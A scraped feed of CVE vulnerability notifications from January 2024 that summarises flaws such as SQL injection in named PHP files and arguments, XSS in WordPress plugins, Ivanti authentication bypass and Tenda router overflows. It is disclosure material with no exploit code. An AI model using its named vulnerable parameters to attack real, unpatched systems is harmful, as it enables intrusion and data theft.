🚨 CVE-2024-0495A vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600.🎖@cveNotify |
|
| 2024-01-13 16:37:25 |
🚨 CVE-2024-0494A vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599.🎖@cveNotify |
|
| 2024-01-13 16:37:24 |
🚨 CVE-2024-0493A vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 15:37:25 |
🚨 CVE-2024-0492A vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 15:37:24 |
🚨 CVE-2024-0491A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596.🎖@cveNotify |
|
| 2024-01-13 14:37:25 |
🚨 CVE-2024-0490A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595.🎖@cveNotify |
|
| 2024-01-13 14:37:24 |
🚨 CVE-2024-0489A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 13:37:25 |
🚨 CVE-2024-0488A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 13:37:24 |
🚨 CVE-2024-0487A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592.🎖@cveNotify |
|
| 2024-01-13 12:37:24 |
🚨 CVE-2024-0486A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591.🎖@cveNotify |
|
| 2024-01-13 11:37:25 |
🚨 CVE-2024-0485A vulnerability, which was classified as critical, was found in code-projects Fighting Cock Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 11:37:24 |
🚨 CVE-2024-0484A vulnerability, which was classified as critical, has been found in code-projects Fighting Cock Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 10:37:24 |
🚨 CVE-2024-0482A vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587.🎖@cveNotify |
|
| 2024-01-13 09:37:24 |
🚨 CVE-2024-0481A vulnerability was found in Taokeyun up to 1.0.5. It has been rated as critical. Affected by this issue is the function shopGoods of the file application/index/controller/app/store/Goods.php of the component HTTP POST Request Handler. The manipulation of the argument keyword leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250586 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 08:37:25 |
🚨 CVE-2024-0480A vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 08:37:24 |
🚨 CVE-2024-0251The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.🎖@cveNotify |
|
| 2024-01-13 07:37:25 |
🚨 CVE-2024-0479A vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584.🎖@cveNotify |
|
| 2024-01-13 07:37:24 |
🚨 CVE-2024-0478A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583.🎖@cveNotify |
|
| 2024-01-13 06:37:25 |
🚨 CVE-2024-0477A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 06:37:24 |
🚨 CVE-2024-0476A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 05:07:24 |
🚨 CVE-2020-12880An issue was discovered in Pulse Policy Secure (PPS) and Pulse Connect Secure (PCS) Virtual Appliance before 9.1R8. By manipulating a certain kernel boot parameter, it can be tricked into dropping into a root shell in a pre-install phase where the entire source code of the appliance is available and can be retrieved. (The source code is otherwise inaccessible because the appliance has its hard disks encrypted, and no root shell is available during normal operation.)🎖@cveNotify |
|
| 2024-01-13 04:37:32 |
🚨 CVE-2023-51067An unauthenticated reflected cross-site scripting (XSS) vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 allows attackers to execute arbitrary javascript on a victim's browser via a crafted link.🎖@cveNotify |
|
| 2024-01-13 04:37:25 |
🚨 CVE-2023-51064QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table.🎖@cveNotify |
|
| 2024-01-13 04:37:24 |
🚨 CVE-2023-51062An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command.🎖@cveNotify |
|
| 2024-01-13 02:37:25 |
🚨 CVE-2023-46943An issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.8. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.🎖@cveNotify |
|
| 2024-01-13 02:37:24 |
🚨 CVE-2023-33472An issue was discovered in Scada-LTS v2.7.5.2 build 4551883606 and before, allows remote attackers with low-level authentication to escalate privileges, execute arbitrary code, and obtain sensitive information via Event Handlers function.🎖@cveNotify |
|
| 2024-01-13 02:07:25 |
🚨 CVE-2024-21887A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.🎖@cveNotify |
|
| 2024-01-13 02:07:24 |
🚨 CVE-2023-46805An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.🎖@cveNotify |
|
| 2024-01-13 01:37:32 |
🚨 CVE-2023-51955Tenda AX1803 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-01-13 01:37:25 |
🚨 CVE-2023-51966Tenda AX1803 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function setIptvInfo.🎖@cveNotify |
|
| 2024-01-13 01:37:24 |
🚨 CVE-2023-51961Tenda AX1803 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function formGetIptv.🎖@cveNotify |
|
| 2024-01-13 00:37:25 |
🚨 CVE-2024-22137Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch Constant Contact Forms by MailMunch allows Stored XSS.This issue affects Constant Contact Forms by MailMunch: from n/a through 2.0.11.🎖@cveNotify |
|
| 2024-01-13 00:37:24 |
🚨 CVE-2024-0475A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.🎖@cveNotify |
|
| 2024-01-12 23:37:32 |
🚨 CVE-2024-23301Relax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root.🎖@cveNotify |
|
| 2024-01-12 23:37:25 |
🚨 CVE-2022-4962A vulnerability was found in Apollo 2.0.0/2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /users of the component Configuration Center. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-250430 is the identifier assigned to this vulnerability. NOTE: The maintainer explains that user data information like user id, name, and email are not sensitive.🎖@cveNotify |
|
| 2024-01-12 23:37:24 |
🚨 CVE-2024-20674Windows Kerberos Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-01-12 22:37:32 |
🚨 CVE-2023-20200A vulnerability in the Simple Network Management Protocol (SNMP) service of Cisco FXOS Software for Firepower 4100 Series and Firepower 9300 Security Appliances and of Cisco UCS 6300 Series Fabric Interconnects could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to the improper handling of specific SNMP requests. An attacker could exploit this vulnerability by sending a crafted SNMP request to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: This vulnerability affects all supported SNMP versions. To exploit this vulnerability through SNMPv2c or earlier, an attacker must know the SNMP community string that is configured on an affected device. To exploit this vulnerability through SNMPv3, the attacker must have valid credentials for an SNMP user who is configured on the affected device.🎖@cveNotify |
|
| 2024-01-12 22:37:26 |
🚨 CVE-2023-32439A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5.1 and iPadOS 16.5.1, iOS 15.7.7 and iPadOS 15.7.7, macOS Ventura 13.4.1, Safari 16.5.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-01-12 22:37:25 |
🚨 CVE-2023-0679A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file removeUser.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220220.🎖@cveNotify |
|
| 2024-01-12 22:37:24 |
🚨 CVE-2022-21294Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-01-12 22:07:32 |
🚨 CVE-2023-4257Unchecked user input length in /subsys/net/l2/wifi/wifi_shell.c can cause buffer overflows.🎖@cveNotify |
|
| 2024-01-12 22:07:26 |
🚨 CVE-2023-38201A flaw was found in the Keylime registrar that could allow a bypass of the challenge-response protocol during agent registration. This issue may allow an attacker to impersonate an agent and hide the true status of a monitored machine if the fake agent is added to the verifier list by a legitimate user, resulting in a breach of the integrity of the registrar database.🎖@cveNotify |
|
| 2024-01-12 22:07:25 |
🚨 CVE-2022-20531In Telecom, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-01-12 22:07:24 |
🚨 CVE-2007-3798Integer overflow in print-bgp.c in the BGP dissector in tcpdump 3.9.6 and earlier allows remote attackers to execute arbitrary code via crafted TLVs in a BGP packet, related to an unchecked return value.🎖@cveNotify |
|
| 2024-01-12 21:37:32 |
🚨 CVE-2023-51698Atril is a simple multi-page document viewer. Atril is vulnerable to a critical Command Injection Vulnerability. This vulnerability gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL using a maliciously crafted CBT document which is a TAR archive. A patch is available at commit ce41df6.🎖@cveNotify |
|
| 2024-01-12 21:37:26 |
🚨 CVE-2023-49801Lif Auth Server is a server for validating logins, managing information, and account recovery for Lif Accounts. The issue relates to the `get_pfp` and `get_banner` routes on Auth Server. The issue is that there is no check to ensure that the file that Auth Server is receiving through these URLs is correct. This could allow an attacker access to files they shouldn't have access to. This issue has been patched in version 1.4.0.🎖@cveNotify |
|
| 2024-01-12 21:37:25 |
🚨 CVE-2023-48297Discourse is a platform for community discussion. The message serializer uses the full list of expanded chat mentions (@all and @here) which can lead to a very long array of users. This issue was patched in versions 3.1.4 and beta 3.2.0.beta5.🎖@cveNotify |
|
| 2024-01-12 21:37:24 |
🚨 CVE-2023-42463Wazuh is a free and open source platform used for threat prevention, detection, and response. This bug introduced a stack overflow hazard that could allow a local privilege escalation. This vulnerability was patched in version 4.5.3.🎖@cveNotify |
|
| 2024-01-12 21:07:32 |
🚨 CVE-2023-4753OpenHarmony v3.2.1 and prior version has a system call function usage error. Local attackers can crash kernel by the error input.🎖@cveNotify |
|
| 2024-01-12 21:07:26 |
🚨 CVE-2023-20900A malicious actor that has been granted Guest Operation Privileges https://docs.vmware.com/en/VMware-vSphere/8.0/vsphere-security/GUID-6A952214-0E5E-4CCF-9D2A-90948FF643EC.html in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias https://vdc-download.vmware.com/vmwb-repository/dcr-public/d1902b0e-d479-46bf-8ac9-cee0e31e8ec0/07ce8dbd-db48-4261-9b8f-c6d3ad8ba472/vim.vm.guest.AliasManager.html .🎖@cveNotify |
|
| 2024-01-12 21:07:25 |
🚨 CVE-2009-0034parse.c in sudo 1.6.9p17 through 1.6.9p19 does not properly interpret a system group (aka %group) in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command.🎖@cveNotify |
|
| 2024-01-12 21:07:24 |
🚨 CVE-2008-3424Condor before 7.0.4 does not properly handle wildcards in the ALLOW_WRITE, DENY_WRITE, HOSTALLOW_WRITE, or HOSTDENY_WRITE configuration variables in authorization policy lists, which might allow remote attackers to bypass intended access restrictions.🎖@cveNotify |
|
| 2024-01-12 20:37:25 |
🚨 CVE-2023-6148Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access and access to configure or edit jobs to utilize the plugin to configure a potential rouge endpoint via which it was possible to control response for certain request which could be injected with XSS payloads leading to XSS while processing the response data🎖@cveNotify |
|
| 2024-01-12 20:37:24 |
🚨 CVE-2023-50974In Appwrite CLI before 3.0.0, when using the login command, the credentials of the Appwrite user are stored in a ~/.appwrite/prefs.json file with 0644 as UNIX permissions. Any user of the local system can access those credentials.🎖@cveNotify |
|
| 2024-01-12 20:07:32 |
🚨 CVE-2024-0226Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload.🎖@cveNotify |
|
| 2024-01-12 20:07:25 |
🚨 CVE-2023-49235An issue was discovered in libremote_dbg.so on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Filtering of debug information is mishandled during use of popen. Consequently, an attacker can bypass validation and execute a shell command.🎖@cveNotify |
|
| 2024-01-12 20:07:24 |
🚨 CVE-2024-22125Under certain conditions the Microsoft Edge browser extension (SAP GUI connector for Microsoft Edge) - version 1.0, allows an attacker to access highly sensitive information which would otherwise be restricted causing high impact on confidentiality.🎖@cveNotify |
|
| 2024-01-12 19:37:32 |
🚨 CVE-2023-34332AMI’s SPx containsa vulnerability in the BMC where an Attackermay cause an untrusted pointer to dereference by a local network. A successfulexploitation of this vulnerability may lead to a loss of confidentiality,integrity, and/or availability.🎖@cveNotify |
|
| 2024-01-12 19:37:26 |
🚨 CVE-2024-0348A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the component File Upload Handler. The manipulation leads to resource consumption. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250116.🎖@cveNotify |
|
| 2024-01-12 19:37:25 |
🚨 CVE-2024-22370In JetBrains YouTrack before 2023.3.22666 stored XSS via markdown was possible🎖@cveNotify |
|
| 2024-01-12 19:37:24 |
🚨 CVE-2023-27098TP-Link Tapo APK up to v2.12.703 uses hardcoded credentials for access to the login panel.🎖@cveNotify |
|
| 2024-01-12 19:07:33 |
🚨 CVE-2024-20696Windows Libarchive Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-12 19:07:26 |
🚨 CVE-2023-39336An unspecified SQL Injection vulnerability in Ivanti Endpoint Manager released prior to 2022 SU 5 allows an attacker with access to the internal network to execute arbitrary SQL queries and retrieve output without the need for authentication. Under specific circumstances, this may also lead to RCE on the core server.🎖@cveNotify |
|
| 2024-01-12 19:07:25 |
🚨 CVE-2023-6798The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin's settings including proxy settings, which are also exposed to authors.🎖@cveNotify |
|
| 2024-01-12 19:07:24 |
🚨 CVE-2023-50121Autel EVO NANO drone flight control firmware version 1.6.5 is vulnerable to denial of service (DoS).🎖@cveNotify |
|
| 2024-01-12 18:37:25 |
🚨 CVE-2024-0462A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.🎖@cveNotify |
|
| 2024-01-12 18:37:24 |
🚨 CVE-2024-0347A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115.🎖@cveNotify |
|
| 2024-01-12 18:07:32 |
🚨 CVE-2023-46805An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.🎖@cveNotify |
|
| 2024-01-12 18:07:25 |
🚨 CVE-2023-1077In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption.🎖@cveNotify |
|
| 2024-01-12 18:07:24 |
🚨 CVE-2022-45919An issue was discovered in the Linux kernel through 6.0.10. In drivers/media/dvb-core/dvb_ca_en50221.c, a use-after-free can occur is there is a disconnect after an open, because of the lack of a wait_event.🎖@cveNotify |
|
| 2024-01-12 17:37:36 |
🚨 CVE-2024-21887A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.🎖@cveNotify |
|
| 2024-01-12 17:37:31 |
🚨 CVE-2023-46805An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.🎖@cveNotify |
|
| 2024-01-12 17:37:30 |
🚨 CVE-2024-21325Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-12 17:37:26 |
🚨 CVE-2024-21320Windows Themes Spoofing Vulnerability🎖@cveNotify |
|
| 2024-01-12 17:37:25 |
🚨 CVE-2023-52142Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cool Plugins Events Shortcodes For The Events Calendar.This issue affects Events Shortcodes For The Events Calendar: from n/a through 2.3.1.🎖@cveNotify |
|
| 2024-01-12 17:37:24 |
🚨 CVE-2023-46245Kimai is a web-based multi-user time-tracking application. Versions prior to 2.1.0 are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities. Version 2.1.0 enables security measures for custom Twig templates.🎖@cveNotify |
|
| 2024-01-12 17:07:37 |
🚨 CVE-2024-22493A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.🎖@cveNotify |
|
| 2024-01-12 17:07:31 |
🚨 CVE-2024-22492A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.🎖@cveNotify |
|
| 2024-01-12 17:07:30 |
🚨 CVE-2023-51978In PHPGurukul Art Gallery Management System v1.1, "Update Artist Image" functionality of "imageid" parameter is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2024-01-12 17:07:29 |
🚨 CVE-2023-28898The Real-Time Streaming Protocol implementation in the MIB3 infotainment incorrectly handles requests to /logs URI, when the id parameter equals to zero. This issue allows an attacker connected to the in-vehicle Wi-Fi network to cause denial-of-service of the infotainment system, when the certain preconditions are met.Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2024-01-12 17:07:26 |
🚨 CVE-2024-21735SAP LT Replication Server - version S4CORE 103, S4CORE 104, S4CORE 105, S4CORE 106, S4CORE 107, S4CORE 108, does not perform necessary authorization checks. This could allow an attacker with high privileges to perform unintended actions, resulting in escalation of privileges, which has High impact on confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2024-01-12 17:07:25 |
🚨 CVE-2024-21646Azure uAMQP is a general purpose C library for AMQP 1.0. The UAMQP library is used by several clients to implement AMQP protocol communication. When clients using this library receive a crafted binary type data, an integer overflow or wraparound or memory safety issue can occur and may cause remote code execution. This vulnerability has been patched in release 2024-01-01.🎖@cveNotify |
|
| 2024-01-12 16:37:24 |
🚨 CVE-2022-0847A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-12 16:07:26 |
🚨 CVE-2023-50585Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2024-01-12 16:07:25 |
🚨 CVE-2023-51406Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ninja Team FastDup – Fastest WordPress Migration & Duplicator.This issue affects FastDup – Fastest WordPress Migration & Duplicator: from n/a through 2.1.7.🎖@cveNotify |
|
| 2024-01-12 16:07:24 |
🚨 CVE-2023-27739easyXDM 2.5 allows XSS via the xdm_e parameter.🎖@cveNotify |
|
| 2024-01-12 15:37:25 |
🚨 CVE-2024-21663Discord-Recon is a Discord bot created to automate bug bounty recon, automated scans and information gathering via a discord server. Discord-Recon is vulnerable to remote code execution. An attacker is able to execute shell commands in the server without having an admin role. This vulnerability has been fixed in version 0.0.8.🎖@cveNotify |
|
| 2024-01-12 15:07:36 |
🚨 CVE-2023-42826The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing a file may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-12 15:07:31 |
🚨 CVE-2023-41987This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-01-12 15:07:30 |
🚨 CVE-2024-0349A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to sensitive cookie without secure attribute. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-250117 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-12 15:07:26 |
🚨 CVE-2023-51539Cross-Site Request Forgery (CSRF) vulnerability in Apollo13Themes Apollo13 Framework Extensions.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.1.🎖@cveNotify |
|
| 2024-01-12 15:07:25 |
🚨 CVE-2021-29461Discord Recon Server is a bot that allows one to do one's reconnaissance process from one's Discord. A vulnerability in Discord Recon Server prior to 0.0.3 could be exploited to read internal files from the system and write files into the system resulting in remote code execution. This issue has been fixed in version 0.0.3. As a workaround, one may copy the code from `assets/CommandInjection.py` in the Discord Recon Server code repository and overwrite vulnerable code from one's own Discord Recon Server implementation with code that contains the patch.🎖@cveNotify |
|
| 2024-01-12 15:07:24 |
🚨 CVE-2021-21433Discord Recon Server is a bot that allows you to do your reconnaissance process from your Discord. Remote code execution in version 0.0.1 would allow remote users to execute commands on the server resulting in serious issues. This flaw is patched in 0.0.2.🎖@cveNotify |
|
| 2024-01-12 14:37:38 |
🚨 CVE-2023-29050The optional "LDAP contacts provider" could be abused by privileged users to inject LDAP filter strings that allow to access content outside of the intended hierarchy. Unauthorized users could break confidentiality of information in the directory and potentially cause high load on the directory server, leading to denial of service. Encoding has been added for user-provided fragments that are used when constructing the LDAP query. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 14:37:31 |
🚨 CVE-2023-7104A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999.🎖@cveNotify |
|
| 2024-01-12 14:37:30 |
🚨 CVE-2023-6337HashiCorp Vault and Vault Enterprise 1.12.0 and newer are vulnerable to a denial of service through memory exhaustion of the host when handling large unauthenticated and authenticated HTTP requests from a client. Vault will attempt to map the request to memory, resulting in the exhaustion of available memory on the host, which may cause Vault to crash.Fixed in Vault 1.15.4, 1.14.8, 1.13.12.🎖@cveNotify |
|
| 2024-01-12 14:37:26 |
🚨 CVE-2023-29258IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1, and 11.5 is vulnerable to a denial of service through a specially crafted federated query on specific federation objects. IBM X-Force ID: 252048.🎖@cveNotify |
|
| 2024-01-12 14:37:25 |
